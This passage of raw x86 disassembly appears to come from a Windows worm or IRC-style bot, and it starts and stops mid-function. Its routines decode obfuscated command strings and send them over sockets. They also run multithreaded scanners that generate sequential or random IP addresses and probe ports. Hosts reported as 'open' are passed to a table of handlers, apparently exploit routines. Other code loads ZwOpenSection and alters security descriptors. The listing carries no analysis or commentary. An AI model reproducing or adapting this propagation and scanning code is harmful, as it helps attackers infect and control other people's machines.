lea eax, [ebp+var_2B0]
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [ebp+var_2B0]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_454A10
lea eax, [ebp+var_1B0]
push [ebp+arg_C4]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSSSS ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429AEE
add esp, 60h
jmp loc_401E00
; ---------------------------------------------------------------------------
loc_401D6F: ; CODE XREF: sub_401B6E+14B�j
mov ebx, offset dword_456B88
push ebx
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push ebx
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_456988
push offset dword_456788
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_456780
lea eax, [ebp+var_1B0]
push offset dword_456580
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSS_0 ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429AEE
mov ebx, [ebp+arg_C4]
add esp, 6Ch
loc_401E00: ; CODE XREF: sub_401B6E+1FC�j
lea eax, [ebp+var_1B0]
push edi
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_1B0]
push eax
push ebx
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_401E67
push esi
call dword_43718C ; Sleep
lea eax, [ebp+var_2B0]
push eax
push offset aS_6 ; "%s\r\n"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_429AEE
add esp, 10h
lea eax, [ebp+var_1B0]
push edi
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_1B0]
push eax
push ebx
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401E6B
loc_401E67: ; CODE XREF: sub_401B6E+69�j
; sub_401B6E+C4�j ...
xor eax, eax
jmp short loc_401E89
; ---------------------------------------------------------------------------
loc_401E6B: ; CODE XREF: sub_401B6E+2F7�j
push edi
lea eax, [ebp+var_6B0]
push 400h
push eax
push ebx
call dword_456F38 ; recv
push ebx
call dword_456FD0 ; closesocket
xor eax, eax
inc eax
loc_401E89: ; CODE XREF: sub_401B6E+2FB�j
pop edi
pop esi
pop ebx
leave
retn
sub_401B6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E8E proc near ; CODE XREF: .text:00401982�p
; sub_403B6C+1DB�p ...
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_43AB70
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset off_43AB68
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_454A34
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call dword_437180 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_429B3F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_429B3F
add esp, 10h
jmp short loc_401F2C
; ---------------------------------------------------------------------------
loc_401F21: ; CODE XREF: sub_401E8E+AF�j
push 7D0h
call dword_43718C ; Sleep
loc_401F2C: ; CODE XREF: sub_401E8E+91�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call dword_456E14
test eax, eax
jnz short loc_401F21
pop edi
inc eax
pop esi
leave
retn
sub_401E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F44 proc near ; CODE XREF: sub_40A938+6125�p
; sub_40A938+9A36�p
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jz loc_402034
push 10h
mov ebx, offset dword_454A00
push 0
push ebx
call sub_429690
push 10h
lea eax, [ebp+var_20]
push [ebp+arg_0]
push eax
call sub_429C40
mov esi, offset dword_43AB8C
lea eax, [ebp+var_20]
push esi
push eax
call sub_429B8E
add esp, 20h
mov [ebp+var_10], eax
test eax, eax
jz loc_402034
xor edi, edi
inc edi
loc_401F94: ; CODE XREF: sub_401F44+6C�j
push esi
push 0
call sub_429B8E
xor edx, edx
pop ecx
cmp eax, edx
pop ecx
mov [ebp+edi*4+var_10], eax
jz loc_402034
inc edi
cmp edi, 4
jl short loc_401F94
cmp [ebp+arg_8], 1
jnz short loc_401FDE
cmp [ebp+arg_4], edx
mov ecx, offset dword_43AB88
mov eax, offset dword_43A30C
mov esi, ecx
jnz short loc_401FDA
mov esi, eax
mov edx, eax
loc_401FCD: ; CODE XREF: sub_401F44+98�j
cmp [ebp+arg_4], 0
jz short loc_401FD5
mov eax, ecx
loc_401FD5: ; CODE XREF: sub_401F44+8D�j
push esi
push edx
push eax
jmp short loc_40201F
; ---------------------------------------------------------------------------
loc_401FDA: ; CODE XREF: sub_401F44+83�j
mov edx, ecx
jmp short loc_401FCD
; ---------------------------------------------------------------------------
loc_401FDE: ; CODE XREF: sub_401F44+72�j
cmp [ebp+arg_8], 2
jnz short loc_402003
cmp [ebp+arg_4], edx
mov ecx, offset dword_43AB88
mov eax, offset dword_43A30C
mov edx, ecx
jnz short loc_401FF7
mov edx, eax
loc_401FF7: ; CODE XREF: sub_401F44+AF�j
cmp [ebp+arg_4], 0
jz short loc_401FFF
mov eax, ecx
loc_401FFF: ; CODE XREF: sub_401F44+B7�j
push edx
push eax
jmp short loc_40201C
; ---------------------------------------------------------------------------
loc_402003: ; CODE XREF: sub_401F44+9E�j
cmp [ebp+arg_8], 3
jnz short loc_402034
cmp [ebp+arg_4], edx
mov eax, offset dword_43AB88
jnz short loc_402018
mov eax, offset dword_43A30C
loc_402018: ; CODE XREF: sub_401F44+CD�j
push eax
push [ebp+var_8]
loc_40201C: ; CODE XREF: sub_401F44+BD�j
push [ebp+var_C]
loc_40201F: ; CODE XREF: sub_401F44+94�j
push [ebp+var_10]
push offset dword_43AB7C
push ebx
call sub_429A33
add esp, 18h
mov eax, ebx
jmp short loc_402036
; ---------------------------------------------------------------------------
loc_402034: ; CODE XREF: sub_401F44+D�j
; sub_401F44+47�j ...
xor eax, eax
loc_402036: ; CODE XREF: sub_401F44+EE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401F44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40203B proc near ; CODE XREF: sub_40A938+5E3A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 8
call sub_423737
test eax, eax
pop ecx
jle short loc_402083
mov eax, [ebp+arg_C]
mov eax, dword_4540B8[eax*8]
push eax
call dword_456FBC ; inet_ntoa
cmp [ebp+arg_8], 0
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset dword_43AB9C
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40207C
call sub_41CD84
loc_402077: ; CODE XREF: sub_40203B+46�j
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40207C: ; CODE XREF: sub_40203B+35�j
call sub_41CD0E
jmp short loc_402077
; ---------------------------------------------------------------------------
loc_402083: ; CODE XREF: sub_40203B+D�j
cmp [ebp+arg_8], 0
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset dword_43AB90
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_4020A0
call sub_41CD84
jmp short loc_4020A5
; ---------------------------------------------------------------------------
loc_4020A0: ; CODE XREF: sub_40203B+5C�j
call sub_41CD0E
loc_4020A5: ; CODE XREF: sub_40203B+63�j
add esp, 10h
pop ebp
retn
sub_40203B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020AA proc near ; CODE XREF: sub_40242A+58�p
var_C = dword ptr -0Ch
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_AC = dword ptr 0B4h
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_AC]
push edi
cmp eax, 0FFFFFFFFh
jz loc_4021D1
shl eax, 6
xor edi, edi
cmp dword_43A384[eax], edi
jz loc_4021D1
push 0Ch
call sub_423737
test eax, eax
pop ecx
jnz loc_4021D1
cmp dword_457F48, edi
jnz short loc_402108
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
mov [esp+0Ch+var_C], 0F618h
push 9C4h
call sub_41E34F
pop ecx
pop ecx
jmp short loc_40210F
; ---------------------------------------------------------------------------
loc_402108: ; CODE XREF: sub_4020AA+3B�j
movzx eax, word_443982
loc_40210F: ; CODE XREF: sub_4020AA+5C�j
push esi
mov esi, offset dword_454754
push 104h
push esi
push edi
mov dword_454964, eax
mov dword_454960, edi
call dword_437178 ; GetModuleFileNameA
push 103h
push offset dword_443990
push offset dword_454858
call sub_429C40
lea eax, [ebp+arg_10]
push 7Fh
push eax
push offset dword_454968
mov dword_4549F4, edi
call sub_429C40
push esi
mov eax, [ebp+arg_CC]
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
mov dword_4549F8, eax
push dword_454964
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
push offset aSSSISS_ ; "%s %s, %s: %i, %s: %s."
push 0Ch
call sub_4233DE
add esp, 38h
mov dword_45495C, eax
lea eax, [ebp+var_4]
push eax
push edi
push offset dword_454750
push offset sub_402CBA
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, dword_45495C
pop esi
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz short loc_4021D1
jmp short loc_4021C9
; ---------------------------------------------------------------------------
loc_4021C1: ; CODE XREF: sub_4020AA+125�j
push 32h
call dword_43718C ; Sleep
loc_4021C9: ; CODE XREF: sub_4020AA+115�j
cmp dword_4549F4, edi
jz short loc_4021C1
loc_4021D1: ; CODE XREF: sub_4020AA+E�j
; sub_4020AA+1F�j ...
pop edi
leave
retn
sub_4020AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4021D4 proc near ; CODE XREF: sub_402646:loc_4026AE�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4540B8h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_429350
add esp, 0Ch
push [ebp+arg_0]
call dword_456E08 ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_456F14 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_429350
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_4021D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40221C proc near ; CODE XREF: sub_402646+60�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_4292D0
cmp eax, 0Fh
pop ecx
jbe short loc_402244
xor eax, eax
jmp short loc_4022B5
; ---------------------------------------------------------------------------
loc_402244: ; CODE XREF: sub_40221C+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_429D3E
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_402271
call sub_429ACC
mov [ebp+var_C], eax
loc_402271: ; CODE XREF: sub_40221C+4B�j
cmp [ebp+var_8], esi
jnz short loc_40227E
call sub_429ACC
mov [ebp+var_8], eax
loc_40227E: ; CODE XREF: sub_40221C+58�j
cmp [ebp+var_4], esi
jnz short loc_40228B
call sub_429ACC
mov [ebp+var_4], eax
loc_40228B: ; CODE XREF: sub_40221C+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_402297
call sub_429ACC
loc_402297: ; CODE XREF: sub_40221C+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4540B8[ecx*8], eax
loc_4022B5: ; CODE XREF: sub_40221C+26�j
pop esi
leave
retn
sub_40221C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022B8 proc near ; CODE XREF: sub_402646+78�p
; sub_4044F6+B86�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push offset dword_457C20
push [ebp+arg_0]
call dword_456FBC ; inet_ntoa
mov esi, dword_437174
push eax
call esi ; dword_437174
test eax, eax
jz loc_402386
push offset dword_457CD8
push [ebp+arg_0]
call dword_456FBC ; inet_ntoa
push eax
call esi ; dword_437174
test eax, eax
jz loc_402386
xor edi, edi
xor ebx, ebx
inc edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_456FB0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_402386
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_456F18 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_456FD4 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_456E9C ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_456EFC ; select
push esi
mov edi, eax
call dword_456FD0 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
jmp short loc_402388
; ---------------------------------------------------------------------------
loc_402386: ; CODE XREF: sub_4022B8+25�j
; sub_4022B8+3E�j ...
xor eax, eax
loc_402388: ; CODE XREF: sub_4022B8+CC�j
pop edi
pop esi
pop ebx
leave
retn
sub_4022B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40238D proc near ; CODE XREF: sub_41F02F+12C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
inc edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_456FB0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4023B6
xor eax, eax
jmp short loc_402425
; ---------------------------------------------------------------------------
loc_4023B6: ; CODE XREF: sub_40238D+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_456F18 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_456FD4 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_456E9C ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_456EFC ; select
push esi
mov edi, eax
call dword_456FD0 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_402425: ; CODE XREF: sub_40238D+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40238D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40242A proc near ; DATA XREF: sub_40A938+62ED�o
; sub_40A938+9BB7�o
var_CC = byte ptr -0CCh
var_BC = byte ptr -0BCh
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 33h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_CC]
inc ebx
rep movsd
mov ecx, [ebp+var_4]
mov [eax+0C0h], ebx
lea eax, [ebp+var_CC]
mov [ebp+arg_0], ecx
push eax
call dword_456F5C ; inet_addr
push [ebp+var_4]
mov ecx, [ebp+var_30]
lea esi, [ebp+var_CC]
sub esp, 0CCh
mov dword_4540B8[ecx*8], eax
push 33h
pop ecx
mov edi, esp
rep movsd
call sub_4020AA
push 8
call sub_423737
add esp, 0D4h
cmp eax, ebx
jnz short loc_402515
mov esi, offset dword_45472C
push esi
call dword_437164 ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_437168 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_402515
cmp [ebp+var_1C], eax
mov edi, dword_43716C
mov esi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov ebx, offset aSSD_0 ; "%s %s: <%d>"
jnz short loc_4024EA
cmp [ebp+var_18], eax
jnz short loc_4024F0
call edi ; dword_43716C
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
lea eax, [ebp+var_BC]
push ebx
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 18h
loc_4024EA: ; CODE XREF: sub_40242A+9D�j
cmp [ebp+var_18], 0
jz short loc_40250C
loc_4024F0: ; CODE XREF: sub_40242A+A2�j
call edi ; dword_43716C
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
lea eax, [ebp+var_BC]
push ebx
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_40250C: ; CODE XREF: sub_40242A+C4�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_402515: ; CODE XREF: sub_40242A+6C�j
; sub_40242A+88�j
mov eax, [ebp+var_30]
cmp [ebp+var_24], ebx
mov edi, ebx
mov esi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov dword_4540BC[eax*8], ebx
mov ebx, dword_43718C
jb short loc_4025A5
loc_402531: ; CODE XREF: sub_40242A+179�j
push edi
lea eax, [ebp+var_CC]
push [ebp+var_30]
mov [ebp+var_28], edi
push [ebp+var_3C]
push eax
push esi
push offset aSSDThreadDSubT ; "%s %s:%d, Thread: %d, Sub-thread: %d."
push 8
call sub_4233DE
mov [ebp+var_2C], eax
imul eax, 2724h
mov ecx, [ebp+var_30]
add esp, 1Ch
mov dword_46D704[eax], ecx
xor eax, eax
push eax
lea ecx, [ebp+var_CC]
push eax
push ecx
push offset sub_402646
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_2C]
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jz short loc_40259B
jmp short loc_402595
; ---------------------------------------------------------------------------
loc_402591: ; CODE XREF: sub_40242A+16F�j
push 1Eh
call ebx ; dword_43718C
loc_402595: ; CODE XREF: sub_40242A+165�j
cmp [ebp+var_8], 0
jz short loc_402591
loc_40259B: ; CODE XREF: sub_40242A+163�j
push 1Eh
call ebx ; dword_43718C
inc edi
cmp edi, [ebp+var_24]
jbe short loc_402531
loc_4025A5: ; CODE XREF: sub_40242A+105�j
xor edi, edi
cmp [ebp+var_34], edi
jz short loc_4025C1
mov eax, [ebp+var_34]
imul eax, 0EA60h
push eax
call ebx ; dword_43718C
jmp short loc_4025CE
; ---------------------------------------------------------------------------
loc_4025BA: ; CODE XREF: sub_40242A+1A2�j
push 7D0h
call ebx ; dword_43718C
loc_4025C1: ; CODE XREF: sub_40242A+180�j
mov eax, [ebp+var_30]
cmp dword_4540BC[eax*8], 1
jz short loc_4025BA
loc_4025CE: ; CODE XREF: sub_40242A+18E�j
mov eax, [ebp+var_30]
cmp [ebp+var_1C], edi
mov eax, dword_4540B8[eax*8]
jnz short loc_40260D
cmp [ebp+var_14], edi
jz short loc_40260D
push [ebp+var_34]
push [ebp+var_3C]
push eax
call dword_456FBC ; inet_ntoa
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push esi
lea eax, [ebp+var_BC]
push offset aSSAtSDAfterDMi ; "%s %s at %s:%d after %d minute(s)."
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 20h
loc_40260D: ; CODE XREF: sub_40242A+1B1�j
; sub_40242A+1B6�j
mov eax, [ebp+var_30]
push 0BB8h
mov dword_4540BC[eax*8], edi
call ebx ; dword_43718C
push 8
call sub_423737
cmp eax, 1
pop ecx
jnz short loc_402636
push offset dword_45472C
call dword_437164 ; RtlDeleteCriticalSection
loc_402636: ; CODE XREF: sub_40242A+1FF�j
push [ebp+var_30]
call sub_42355A
pop ecx
push edi
call dword_437170 ; ExitThread
sub_40242A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402646 proc near ; DATA XREF: sub_40242A+145�o
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_104 = byte ptr -104h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D4 = byte ptr -0D4h
var_C4 = byte ptr -0C4h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 198h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 33h
mov esi, eax
pop ecx
lea edi, [ebp+var_D4]
rep movsd
mov ecx, [ebp+var_C]
mov esi, [ebp+var_34]
mov [ebp+var_4], ecx
mov dword ptr [eax+0C4h], 1
mov [ebp+var_8], esi
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
mov eax, esi
pop ecx
imul eax, 2724h
lea ebx, dword_46D704[eax]
jmp loc_4027D4
; ---------------------------------------------------------------------------
loc_402698: ; CODE XREF: sub_402646+198�j
cmp [ebp+var_18], 0
push eax
jz short loc_4026AE
lea eax, [ebp+var_D4]
push eax
call sub_40221C
pop ecx
jmp short loc_4026B3
; ---------------------------------------------------------------------------
loc_4026AE: ; CODE XREF: sub_402646+57�j
call sub_4021D4
loc_4026B3: ; CODE XREF: sub_402646+66�j
pop ecx
mov [ebp+arg_0], eax
push [ebp+var_40]
push [ebp+var_44]
push eax
call sub_4022B8
add esp, 0Ch
cmp eax, 1
jnz loc_4027C9
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_402726
mov edi, offset dword_45472C
push edi
call dword_4370C8 ; RtlEnterCriticalSection
cmp [ebp+var_24], 0
jnz short loc_40271A
push [ebp+var_44]
push [ebp+arg_0]
call dword_456FBC ; inet_ntoa
push eax
push offset aIde746o6B_ ; "Ide74/6o6/B."
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
lea eax, [ebp+var_C4]
push offset aSSSSDOpen_ ; "%s %s%s: %s:%d open."
push eax
push [ebp+var_4]
call sub_41CD84
add esp, 20h
loc_40271A: ; CODE XREF: sub_402646+9F�j
push edi
call dword_437160 ; RtlLeaveCriticalSection
jmp loc_4027C9
; ---------------------------------------------------------------------------
loc_402726: ; CODE XREF: sub_402646+8D�j
push [ebp+arg_0]
call dword_456FBC ; inet_ntoa
push eax
lea eax, [ebp+var_198]
push eax
call sub_429A33
mov eax, [ebp+var_28]
shl eax, 6
add eax, offset aD1 ; "d1"
push eax
lea eax, [ebp+var_104]
push eax
call sub_429A33
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_188]
push eax
call sub_429A33
mov eax, [ebp+var_24]
sub esp, 0ACh
mov [ebp+var_E0], eax
mov eax, [ebp+var_1C]
mov [ebp+var_DC], eax
mov eax, [ebp+var_20]
mov [ebp+var_E4], eax
mov eax, [ebp+var_44]
push 31h
mov [ebp+var_F4], eax
mov eax, [ebp+var_28]
pop ecx
mov [ebp+var_F0], esi
lea esi, [ebp+var_198]
mov edi, esp
push [ebp+var_4]
mov [ebp+var_EC], eax
rep movsd
lea ecx, [ebp+var_C4]
shl eax, 6
push ecx
call off_43A37C[eax]
mov esi, [ebp+var_8]
add esp, 0CCh
loc_4027C9: ; CODE XREF: sub_402646+83�j
; sub_402646+DB�j
push 7D0h
call dword_43718C ; Sleep
loc_4027D4: ; CODE XREF: sub_402646+4D�j
mov eax, [ebx]
cmp dword_4540BC[eax*8], 0
jnz loc_402698
push esi
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
sub_402646 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4027F3 proc near ; CODE XREF: sub_402BA8+76�p
push offset aNtdll_dll ; "ntdll.dll"
call dword_437034 ; LoadLibraryA
test eax, eax
mov dword_454A1C, eax
jz short loc_40283F
push esi
mov esi, dword_437030
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push eax
call esi ; dword_437030
push offset aZwopensection ; "ZwOpenSection"
mov dword_454A14, eax
push dword_454A1C
call esi ; dword_437030
cmp dword_454A14, 0
mov dword_454A18, eax
pop esi
jz short loc_40283F
test eax, eax
jz short loc_40283F
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40283F: ; CODE XREF: sub_4027F3+12�j
; sub_4027F3+42�j ...
xor eax, eax
retn
sub_4027F3 endp
; =============== S U B R O U T I N E =======================================
sub_402842 proc near ; CODE XREF: sub_402BA8+ED�p
; sub_402BA8:loc_402CAE�p
mov eax, dword_454A1C
test eax, eax
jz short loc_402852
push eax
call dword_437038 ; FreeLibrary
loc_402852: ; CODE XREF: sub_402842+7�j
and dword_454A1C, 0
retn
sub_402842 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40285A proc near ; CODE XREF: sub_402900+85�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push esi
lea eax, [ebp+var_8]
push edi
xor esi, esi
push eax
lea eax, [ebp+var_C]
push esi
push eax
push esi
push esi
push 4
push 6
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call dword_43701C ; GetSecurityInfo
test eax, eax
jnz short loc_4028FC
push 20h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_429690
add esp, 0Ch
lea ecx, [ebp+var_4]
xor eax, eax
mov [ebp+var_2C], 2
push ecx
lea ecx, [ebp+var_2C]
push [ebp+var_C]
inc eax
mov [ebp+var_28], eax
mov [ebp+var_24], esi
push ecx
push eax
mov [ebp+var_18], eax
